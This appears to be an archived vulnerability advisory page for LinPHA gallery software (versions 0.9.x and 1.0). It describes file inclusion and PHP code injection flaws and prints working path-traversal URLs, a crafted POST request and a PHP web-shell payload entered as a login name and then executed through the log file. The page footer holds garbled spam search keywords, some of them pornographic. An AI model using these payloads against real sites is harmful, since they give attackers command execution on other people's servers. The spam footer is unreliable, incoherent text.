exploits , vulnerabilities , articles , LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities
| Title |
LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities |
| Published |
2006-02-11-12:00AM |
| Updated |
2006-02-11-12:00AM |
| Class |
Input Validation Error |
| CVE |
|
| Remote |
Yes |
| Local |
No |
| Credit |
Discovery is credited to rgod. |
| Vulnerable |
LinPHA LinPHA 0.9.4
LinPHA LinPHA 0.9.3
LinPHA LinPHA 0.9.2
LinPHA LinPHA 0.9.1
LinPHA LinPHA 0.9 .0
LinPHA LinPHA 1.0 |
| Not Vulnerable |
|
| Code |
The following URI examples were provided for the file inclusion issues:
http://www.example.com/[host]/docs/index.php?lang=/../../../../../../../../../../test
http://www.example.com/[path]/install/install.php?language=/../../../../../../../test
http://www.example.com/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../testhttp://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test
The following HTTP POST example was provided for the file inclusion issues:
POST [path]install/forth_stage_install.php HTTP/1.1
";
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close
language=/../../../../../../../../test
The file inclusion issues may allow for other system files to be retrieved if the 'magic_quotes_gpc' PHP directive is set to off.
The following steps were provided to exploit the PHP code injection issues:
1. Login with username: <?php system($_GET[cmd]);?>
and password: [whatever]
If the 'magic_quotes_gpc' is set to off, it is possible to launch operating system commands through the following request:
http://www.example.com/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 06:39:47 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
%2Fmodules ccc bbc Sexwife c...sca/t. news for c www.dldvb. WWW.89 lo516l dragon fab ww.fucksex firefox se 333 /free indi dragon fab t893t www.cx5158 E-Mail Cra apache 2. Cacti xiaoyoyo.c syeda +JPortal 89seks news for
doctruyens cha10000.c 200+%252Fc manabadi.c India Sex OpenSSH 4 www.bxxka. Kushboo.se www.urlis. guestbook Www sex gi doctruyens Gallerysex port 1081 Andri WWW.1713t. article be icq vico free porn Sexvedioes FUK GIRLS www.jitu8. nudescenes Mamh
|
